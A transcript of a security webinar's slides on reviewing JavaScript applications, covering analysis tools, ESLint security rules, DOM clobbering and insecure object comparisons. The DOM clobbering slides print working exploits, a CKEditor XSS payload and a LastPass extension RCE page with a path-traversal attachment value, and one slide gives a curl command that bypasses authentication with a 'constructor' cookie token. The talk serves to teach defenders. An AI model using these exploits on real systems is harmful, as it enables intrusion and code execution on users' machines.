Which alternative to Crystal Reports is best for small or large businesses.pdf
2025 Textile ERP Trends: SAP, Odoo & Oracle
Upgrade and Innovation Strategies for SAP ERP Customers
Claude Code: Everyone is a 10x Developer - A Comprehensive AI-Powered CLI Tool
T3DD25 TYPO3 Content Blocks - Deep Dive by André Kraus
How to Migrate SBCGlobal Email to Yahoo Easily
Introduction to Artificial Intelligence

Webinar–Reviewing Modern JavaScript Applications

  • 1. © 2019 Synopsys, Inc.1 Reviewing Modern JavaScript Applications Lewis Ardern, Senior Security Consultant, Synopsys Software Integrity Group April 29, 2019
  • 2. © 2019 Synopsys, Inc.2 About me Senior Security Consultant, Synopsys Software Integrity Group – Consultant at formerly Cigital Prior to Cigital • B.Sc. in computer security and ethical hacking – Founder of the Leeds Ethical Hacking Society • Software developer • Security consultant About Synopsys • Historically all about hardware • Software Integrity Group formed to tackle software • Team consisting of well-known organizations – Black Duck – Coverity – Codenomicon – Cigital – Codiscope twitter.com/LewisArdern Lewis Ardern Senior Consultant Software Integrity Group SIG Consulting
  • 3. © 2019 Synopsys, Inc.3 JavaScript landscape
  • 4. © 2019 Synopsys, Inc.4 JavaScript landscape • Runs everywhere: browsers, servers, mobile, IoT devices • Lots of frameworks, high levels of abstraction • Move toward safe-by-default frameworks Database MongoDB Server Node.js/Express.js Client Angular
  • 5. © 2019 Synopsys, Inc.5 Life as we know it “For the sixth year in a row, JavaScript is the most commonly used programming language.” —2018 Stack Overflow Developer Survey https://insights.stackoverflow.com/survey/2016
  • 6. © 2019 Synopsys, Inc.6 Let’s not be REACTive! • Frameworks can offer enormous security benefits at the expense of outpacing existing security tools • It is important to understand the specific security characteristics and guarantees of any framework you deploy • Framework features can sometimes be abused – http://blog.portswigger.net/2017/09/abusing-javascript- frameworks-to-bypass.html • Teams transition / adopt different frameworks in rapid succession
  • 7. © 2019 Synopsys, Inc.7 Modern JavaScript analysis Security professionals need to embrace developer tools to effectively identify security issues • Live in the browser console • Debug effectively • Weaponize developer tools to identify security issues • Commercial products (not covered today)
  • 8. © 2019 Synopsys, Inc.8 What today’s talk covers Real-life examples from domain-specific experts Recommended tools to use Lesser-known JavaScript bugs
  • 9. © 2019 Synopsys, Inc.9 Example 1 • One of the _known_ edge cases with React is that you can provide URI schemes such as `javascript:alert(0)` and get cross-site scripting via an `href` tag • In this HackerOne report, cross-site scripting led to remote code execution due to the steam:// URI used to interact with the steam client https://hackerone.com/reports/409850
  • 10. © 2019 Synopsys, Inc.10 Video @zemnmez cross-site scripting against https://steamcommunity.com
  • 11. © 2019 Synopsys, Inc.11 What did we see? Using the Chrome Developer Console • Beautifying the code • Searching for functions • Debugging client-side values • Overriding values on the fly inside the console • Backticks to bypass controls Knowledge of React pitfalls https://hackerone.com/reports/409850
  • 12. © 2019 Synopsys, Inc.12 Example 2 LiveOverflow’s pop-under RE • Anti-debugging • Various bypass techniques • Deobfuscating JavaScript • Debugging locally • Using proxies • Weird browser quirks https://www.youtube.com/watch?v=8UqHCrGdxOM
  • 13. © 2019 Synopsys, Inc.13 Example 3 Gareth Heyes’ AngularJS research • Deep understanding of JavaScript • Auditing framework code • DOM manipulation • Inspecting objects && prototype overriding https://portswigger.net/blog/dom-based-angularjs-sandbox-escapes https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
  • 14. © 2019 Synopsys, Inc.14 Products that perform JavaScript dataflow analysis: • Coverity Scan • LGTM Tools that look for areas of interest: • Tarnish • JSHint • JSLint • ESLint – Code Climate—nodesecurity plugin • TSLint – tslint-angular-security Tools that look for known issues in JavaScript libraries: • Retire.js • npm audit • yarn audit • GitHub • Snyk • auditjs Tools that deobfuscate JavaScript: • Closure Compiler • JStillery • unminify JavaScript analysis tools Referencing only projects that either are open source or scan open source
  • 15. © 2019 Synopsys, Inc.15 React https://chrome.google.com/webstore/detail/react-developer- tools/fmkadmapgofadopljbjfkapdkoienihi?hl=en AngularJS https://chrome.google.com/webstore/detail/angularjs- batarang/ighdmehidhipcmcojjgiloacoafjmpfk?hl=en Angular https://augury.rangle.io/ Vue https://github.com/vuejs/vue-devtools Framework analysis browser extensions Just because “production mode is set” doesn’t mean they can’t be used for live apps https://lh3.googleusercontent.com/GjX6Q3_FVJfc0DqE2wiPKkgOfth6otzV-D7GV- wB6sH5_t1oodMaHOBLsYOLeydb85bKWu6X=w640-h400-e365
  • 16. © 2019 Synopsys, Inc.16 Known issues in JavaScript libraries Always check for known security issues • GitHub automatically reports security issues • Depending on project type, use tools: Example Command npm npm audit yarn yarn audit bower auditjs --bower bower.json Client-side JavaScript retire --js /path/ Node.js open source snyk test
  • 17. © 2019 Synopsys, Inc.17 ESLint • ESLint is an open source pluggable linting utility for JavaScript • Linters parse ASTs to identify code quality and security issues • ESLint was created to allow developers to enforce rules • Can be hooked into the development release cycle – Many developers do not allow code to be pushed with ESLint issues flagged – You can create Git hooks – Can be part of CI/CD pipeline • Allows custom rules to enforce domain specific guidance
  • 18. © 2019 Synopsys, Inc.18 ESLint ESLint is now the go-to tool for JavaScript developers https://stateofjs.com/2017/other-tools/
  • 19. © 2019 Synopsys, Inc.19 ESLint security rules ESLint can help security consultants look for points of interest Default security rule configs • Node.js https://github.com/nodesecurity/eslint-config-nodesecurity • Vanilla JS https://github.com/mozfreddyb/eslint-config-scanjs • AngularJS https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules • React https://github.com/yannickcr/eslint-plugin-react#list-of-supported-rules Security rules • eslint-plugin-scanjs • eslint-plugin-security • eslint-plugin-react • eslint-plugin-angularjs-security • eslint-plugin-no-wildcard-postmessage • eslint-plugin-no-unsafe-innerhtml • vue/no-v-html • eslint-plugin-prototype-pollution-security-rules
  • 20. © 2019 Synopsys, Inc.20 Problem: In AngularJS security assessments, I want to identify problem locations quickly Solution: Create ESLint rules to run on every assessment as a starting point: JavaScript analysis tools for AngularJS https://www.npmjs.com/package/eslint-plugin-angularjs-security-rules
  • 21. © 2019 Synopsys, Inc.21 Steps to create a rule 1. Create a test with true positive and false positive 2. Walk the JavaScript AST and identify your requirements 3. Create a rule from the AST output 4. Make sure the test passes
  • 22. © 2019 Synopsys, Inc.22 Creating a test
  • 23. © 2019 Synopsys, Inc.23 Identifying the requirements
  • 24. © 2019 Synopsys, Inc.24 Create the rule
  • 25. © 2019 Synopsys, Inc.25 Testing the rules https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 https://github.com/bkimminich/juice-shop
• 26. Lesser-known security issues Let's talk about lesser-known bugs!
• 27. DOM clobbering Due to the DOM specification's named-access rules, certain HTML attributes create JavaScript values: an element's id (and, for some elements, its name) becomes a property of window, and named inputs become properties of their enclosing form. Code that reads an undeclared global, or guards it with a typeof check, can therefore be fed an attacker-supplied element instead. http://jibbering.com/faq/names http://thespanner.co.uk/2013/05/16/dom-clobbering Attributes that can define JavaScript values: • id • action • form – input – name This can lead to: • Cross-site scripting (XSS) • Remote code execution (RCE) in browser extensions
• 28. DOM clobbering
<html>
<head>
</head>
<body>
<test id="value" foooo="value" action="exists"><form>
<div id="valueExists" name="exists"><form>
<script>
if (value.action !== undefined) {
  alert('DOM Clobbering')
}
if (value.foooo !== undefined) {
  // Value does not exist: an unknown attribute is not reflected as a property
}
if (valueExists !== undefined) {
  alert('DOM Clobbering') // the id alone made this global exist
}
if (valueExists.exists !== undefined) {
  // Value does not exist
}
</script>
</body>
</html>
• 29. DOM clobbering
<html>
<body>
<form><input name="ownerDocument"></form>
<script>
console.log(document.forms[0].ownerDocument)
// Should return window.document
// Returns <input name="ownerDocument">: the named input shadows the form's own property
</script>
</body>
</html>
• 30. DOM clobbering
// Exploit code from Mario Heiderich's (x00mario) talk https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
// Exploit
<a href="plugins/preview/preview.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">Click me for dolphins!</a>
// Vulnerable code
<script>
var doc = document;
doc.open();
doc.write(window.opener._cke_htmlToLoad);
doc.close();
delete window.opener._cke_htmlToLoad
</script>
Why it works: the preview page expects the opener to have set a global string, but the anchor's id makes window.opener._cke_htmlToLoad resolve to the <a> element, and an anchor converts to its href string, so the payload in the fragment is written into the document. Exploit that achieved cross-site scripting in CKEditor https://www.slideshare.net/x00mario/in-the-dom-no-one-will-hear-you-scream#34
• 31. Demo DOM clobbering
• 32. DOM clobbering
function lp_url_is_lastpass(e) {
  if (null == e) return !1;
  var t = /^https:\/\/([a-z0-9-]+\.)?lastpass\.(eu|com)\//i
    , n = "https://lastpass.com/";
  if ("undefined" != typeof base_url && (n = base_url), 0 == e.indexOf(n) || 0 == e.indexOf("https://lastpass.com/") || 0 == e.indexOf("https://lastpass.eu/")) return !0;
  if ("undefined" != typeof g_loosebasematching) {
    var i = lp_gettld_url(e);
    return new RegExp(i + "/$").test(base_url)
  }
  return t.test(e)
}
...
"openattach" == t.eventtype.value ? sendBG({
  cmd: "openattach",
  attachkey: t.eventdata1.value,
  data: t.eventdata2.value,
  mimetype: t.eventdata3.value
...
Exploit that achieved remote code execution in the LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
base_url is never declared, so its typeof guard is satisfied by a clobbered element. It can be set with: x = document.createElement("a"); x.setAttribute("id", "base_url");
g_loosebasematching can be defined with <value id="g_loosebasematching" />
Once the origin check passes, the form values are used to send remote procedure calls (RPC) to the extension's background page, leading to RCE
• 33. DOM clobbering
<html>
<head>
<script>
function start() {
  x = document.createElement("a");
  x.setAttribute("id", "base_url");
  x.setAttribute("href", "//" + document.location.hostname);
  document.body.appendChild(x);
  exploit.submit();
}
</script>
</head>
<body onload="start()">
<exploit id="g_loosebasematching" />
<form id="exploit" name="lpwebsiteeventform">
<input type="hidden" name="eventtype" value="openattach">
<input type="hidden" name="eventdata1" value="d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec">
<input type="hidden" name="eventdata2" value="!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==">
<input type="hidden" name="eventdata3" value="other:./../../../../../Desktop/exploit.bat">
</form>
</body>
</html>
Exploit that achieved remote code execution in the LastPass Chrome extension https://bugs.chromium.org/p/project-zero/issues/detail?id=1225&desc=6
• 34. DOM clobbering (screenshot of the exploit, Project Zero attachment) https://bugs.chromium.org/p/project-zero/issues/attachment?aid=277766&signed_aid=cHmKiER3b1GkZKd_e_0PAA==&inline=1
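As an added, worked example (not code from the slides or from eslint-plugin-angularjs-security-rules), here are the four rule-creation steps from slides 21 to 25 applied to the pattern that made the LastPass bug exploitable: a `typeof` guard on a name the file never declares, which an element with that `id` satisfies. The example assumes a small stand-in for ESLint's RuleTester that walks hand-built ESTree nodes, so it runs without ESLint installed; in a real plugin you would use RuleTester and resolve undeclared names through ESLint's scope analysis (the unresolved `through` references of the Program scope) rather than the simple declared-name set used here.

```javascript
'use strict';
// Added example, not code from the slides or from eslint-plugin-angularjs-security-rules.
// Rule: flag `typeof NAME` where NAME is never declared in the file, the clobberable
// pattern in the LastPass snippet ("undefined" != typeof base_url).
// Assumption: runRule() below stands in for ESLint's RuleTester; a real plugin
// should use RuleTester plus ESLint's scope analysis instead of the name set here.

// Step 3: the rule, in ESLint's module format
const noClobberableTypeofGuard = {
  meta: {
    type: 'problem',
    docs: { description: 'typeof guard on an undeclared global can be satisfied by DOM clobbering' },
    schema: [],
    messages: {
      clobberable:
        "'{{name}}' is never declared; an element with id=\"{{name}}\" would define it (DOM clobbering)",
    },
  },
  create(context) {
    const declared = new Set(); // names declared anywhere in the file
    const guards = []; // `typeof <identifier>` nodes seen during traversal
    return {
      VariableDeclarator(node) {
        if (node.id.type === 'Identifier') declared.add(node.id.name);
      },
      FunctionDeclaration(node) {
        if (node.id) declared.add(node.id.name);
      },
      UnaryExpression(node) {
        if (node.operator === 'typeof' && node.argument.type === 'Identifier') guards.push(node);
      },
      // Report on exit so `var` declarations later in the file (hoisted) count as declared
      'Program:exit'() {
        for (const node of guards) {
          const { name } = node.argument;
          if (!declared.has(name)) context.report({ node, messageId: 'clobberable', data: { name } });
        }
      },
    };
  },
};

// Stand-in for RuleTester: walks an ESTree AST, firing the rule's enter and exit
// visitors the way ESLint does, and returns the formatted report messages.
function runRule(rule, ast) {
  const reports = [];
  const context = {
    report({ messageId, data = {} }) {
      reports.push(rule.meta.messages[messageId].replace(/\{\{(\w+)\}\}/g, (_, k) => data[k]));
    },
  };
  const visitors = rule.create(context);
  (function walk(node) {
    if (visitors[node.type]) visitors[node.type](node);
    for (const child of Object.values(node)) {
      for (const c of Array.isArray(child) ? child : [child]) {
        if (c && typeof c === 'object' && typeof c.type === 'string') walk(c);
      }
    }
    if (visitors[`${node.type}:exit`]) visitors[`${node.type}:exit`](node);
  })(ast);
  return reports;
}

// Step 2: the AST shapes, constructed by hand as an AST explorer would show them
const id = (name) => ({ type: 'Identifier', name });
const typeofGuard = (name) => ({
  type: 'ExpressionStatement',
  expression: {
    type: 'BinaryExpression',
    operator: '!=',
    left: { type: 'Literal', value: 'undefined' },
    right: { type: 'UnaryExpression', operator: 'typeof', prefix: true, argument: id(name) },
  },
});
const varDecl = (name) => ({
  type: 'VariableDeclaration',
  kind: 'var',
  declarations: [{ type: 'VariableDeclarator', id: id(name), init: { type: 'Literal', value: '' } }],
});
const program = (...body) => ({ type: 'Program', sourceType: 'script', body });

// Step 1: test cases, invalid (must be flagged) and valid (must not be)
const cases = {
  invalid: program(typeofGuard('base_url'), typeofGuard('g_loosebasematching')),
  validDeclaredBefore: program(varDecl('base_url'), typeofGuard('base_url')),
  validDeclaredAfter: program(typeofGuard('base_url'), varDecl('base_url')),
};

// Step 4: run the rule over every case; returns { caseName: [messages] }
function lintCases() {
  const out = {};
  for (const [name, ast] of Object.entries(cases)) out[name] = runRule(noClobberableTypeofGuard, ast);
  return out;
}

console.log(lintCases());
```

The rule deliberately collects declarations during traversal and reports at `Program:exit`, since a `var` declared after the guard is still hoisted and must not be flagged; a rule that reported inside `UnaryExpression` would produce exactly the false positive step 1 is meant to catch.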
• 35. Insecure object comparisons
Similar to DOM clobbering, there are many other ways an insecure comparison can happen. This Express middleware looks the session token up as a key of a plain object:
const SESSIONS = {}
const mustBeAuthenticated = (req, res, next) => {
  if (req.cookies) {
    const token = req.cookies.token
    if (token && SESSIONS[token]) {
      // allow it
      return next()
    }
  }
  res.send('not authorized!')
}
• 36. Comparison table
Value                        Return
SESSIONS['invalidString']    undefined (falsy)
SESSIONS['']                 undefined (falsy)
SESSIONS['constructor']      function Object() (truthy), inherited from Object.prototype
SESSIONS['hasOwnProperty']   function hasOwnProperty() (truthy), inherited from Object.prototype
• 37. What happens when you create an object in JavaScript?
const test = {}
// test inherits from Object.prototype, so these keys resolve without ever being set:
__proto__:
  constructor: ƒ Object()
  hasOwnProperty: ƒ hasOwnProperty()
  isPrototypeOf: ƒ isPrototypeOf()
  [...]
test['constructor'] === test.constructor // returns true: bracket and dot access are the same lookup, and both walk the prototype chain
• 38. Exploit • This issue is trivial to exploit • Using curl, we can simply run the following command: – curl https://localhost:9000 -H "Cookie: token=constructor" • Alternatively, we can just set the document.cookie value via the browser
• 39. Demo Insecure object comparisons
• 40. How do we correctly check?
Check for an own property instead of a plain lookup:
SESSIONS.hasOwnProperty('__proto__') // false
SESSIONS.hasOwnProperty('validString') // true, once it has been stored
Call it through the prototype, Object.prototype.hasOwnProperty.call(SESSIONS, token), if an attacker could ever store a key named "hasOwnProperty" that would shadow the method.
Or you can use a Map instead of an Object, which has no inherited keys:
SESSIONS.has('__proto__'); // false
SESSIONS.has('validString'); // true, once it has been set
• 41. Note on authentication • Use a well-tested library like Passport to do authentication –http://www.passportjs.org/ • If rolling your own, compare secrets with crypto.timingSafeEqual(a, b) –It compares two equal-length Buffers in constant time, which prevents timing attacks –Check the lengths first: it throws if they differ
• 42. Other issues Prototype pollution • https://www.youtube.com/watch?v=LUsiFV3dsK8 • https://github.com/HoLyVieR/prototype-pollution-nsec18 • https://www.slideshare.net/LewisArdern/dangerous-design-patterns-in-one-line • https://github.com/LewisArdern/eslint-plugin-prototype-pollution-security-rules • https://gist.github.com/LewisArdern/db02e6c37b69c7cb4f1059dc9e536923 Mass assignment • https://talks.amanvir.io/forward-js-san-francisco-security-issues-in-modern-javascript-Jan-2019.pdf • https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet • https://www.npmjs.com/package/mongoose-mass-assign
• 43. Summary • Adopt and embrace developer tools to identify security issues • Conduct regular code reviews • Measure and track your code quality and security • Automate the process: – ESLint for code linting and npm audit for dependencies – Various static analysis tools for quality and security – Break your CI build if any issues get flagged
  • 44. Thank You Questions? Email: lewis@ardern.io Website: https://ardern.io Twitter: https://twitter.com/LewisArdern GitHub: https://github.com/LewisArdern LinkedIn: https://www.linkedin.com/in/lewis-ardern-83373a40